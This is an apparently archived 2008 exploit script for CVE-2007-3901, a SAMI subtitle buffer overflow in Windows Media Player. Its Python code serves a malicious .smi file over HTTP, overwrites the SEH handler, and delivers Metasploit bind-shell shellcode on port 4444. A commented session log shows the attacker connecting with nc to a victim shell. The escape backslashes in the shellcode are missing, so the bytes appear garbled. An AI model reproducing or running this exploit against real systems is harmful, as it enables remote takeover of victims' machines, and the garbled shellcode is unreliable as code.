sami-overflow.txt
Posted on 09 January 2008
#!/usr/bin/python ########################################################################## # Bug discovered by Jun Mao of VeriSign iDefense # http://www.securityfocus.com/bid/26789 # CVE-2007-3901 # Coded by Matteo Memelli aka ryujin # http://www.gray-world.net http://www.be4mind.com # Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700) #------------------------------------------------------------------------ # THX TO all the guys at www.offensive-security.com # EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!! # I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha #------------------------------------------------------------------------ ########################################################################## # On Windows Media Player Open---> http://attacker/anyfile.smi # .smi extension is necessary, filename can be anything. # # badrobot:/home/matte# ./mplayer.py # [+] Listening on port 80 # [+] Connection accepted from: 192.168.1.243 # [+] Payload sent, check your shell on 192.168.1.243 port 4444 # badrobot:/home/matte# nc 192.168.1.243 4444 # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-2000 Microsoft Corp. # # C:Documents and Settings yujinDesktop>ipconfig # ipconfig # # Windows 2000 IP Configuration # # Ethernet adapter Local Area Connection: # # Connection-specific DNS Suffix . : # IP Address. . . . . . . . . . . . : 192.168.1.243 # Subnet Mask . . . . . . . . . . . : 255.255.255.0 # Default Gateway . . . . . . . . . : # # C:Documents and Settings yujinDesktop> ########################################################################## from socket import * # SMI BODY body = """<SAMI> <HEAD> <STYLE TYPE="text/css"> <!-- P { font-size: 1em; font-family: Arial; font-weight: normal; color: #FFFFFF; background: #000000; text-align: center; padding-left: 5px; padding-right: 5px; padding-bottom: 2px; } .ENUSCC { Name: English; lang: EN-US-CC; } --> </STYLE> </HEAD> <BODY> <SYNC Start="0" pippo="""" # Metasploit bind shell on port 4444 EXITFUNC seh shellcode = ( "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45" "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49" "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d" "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66" "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61" "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40" "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6" "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09" "xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0" "x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff" "xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53" "x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff" "xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64" "x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89" "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab" "xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51" "x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53" "xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6" "x52xffxd0x68xf0x8ax04x5fx53xffxd6xffxd0" ) body += 21988*'A' body += 'x90'*16 # NOP Slide body += shellcode + 'C'*67 # to SEH... body += 'xebx06x90x90x2bx1exe1x77' # ShortJmp, and SEH overwrite body += 'x90'*4 + 'xE9x6BxFExFFxFFx90x90' # NearJmp, back to shellcode body += 143505*'E' + '">' body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>' # RESPONSE HEADER header = ( 'HTTP/1.1 200 OK ' 'Content-Type: application/smil ' ' ' ) evilbuf = header + body s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 80)) s.listen(1) print "[+] Listening on port 80" c, addr = s.accept() print "[+] Connection accepted from: %s" % (addr[0]) c.recv(1024) c.send(evilbuf) print "[+] Payload sent, check your shell on %s port 4444" % addr[0] c.close() s.close()